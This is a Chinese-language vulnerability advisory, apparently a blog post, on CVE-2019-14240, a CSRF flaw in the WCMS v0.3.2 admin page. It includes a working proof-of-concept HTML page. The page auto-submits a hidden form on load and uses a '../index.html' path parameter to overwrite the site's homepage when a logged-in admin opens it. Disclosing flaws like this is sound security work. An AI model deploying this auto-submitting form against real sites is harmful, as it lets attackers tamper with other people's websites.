CVE-2019-14240 WCMS v0.3.2后台管理页面存在CSRF漏洞

2019年8月5日00:01:56 发表评论

一、漏洞摘要

漏洞名称: WCMS v0.3.2后台管理页面存在CSRF漏洞
上报日期: 2019-07-12
漏洞发现者: Chen Wu
产品首页: http://wcms.space/
软件链接: https://github.com/vedees/wcms
版本: v0.3.2
CVE编号: CVE-2019-14240

二、漏洞概述

WCMS v0.3.2后台管理页面存在CSRF漏洞,管理员登陆后,打开下面poc.html可触发漏洞,篡改网站首页内容。
CVE-2019-14240 WCMS v0.3.2后台管理页面存在CSRF漏洞

三、利用代码

当管理员登陆后,通过浏览器打开如下页面,可将首页内容改为hack test!
poc.html

<html>
  <head>
  <title> CSRF Proof</title>
  <script type="text/javascript">
    function exec1(){
      document.getElementById('form1').submit();
    }
  </script>
  </head>
  <body onload="exec1();">
    <form id="form1" action="http://www.agesec.com/wex/html.php?finish=../index.html" method="POST">
      <input type="hidden" name="textAreaCode" value="hack test!" />
      <input type="hidden" name="codeEditor" value="" />
    </form>
  </body>
</html>

四、参考信息

CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14240

发表评论

后发表评论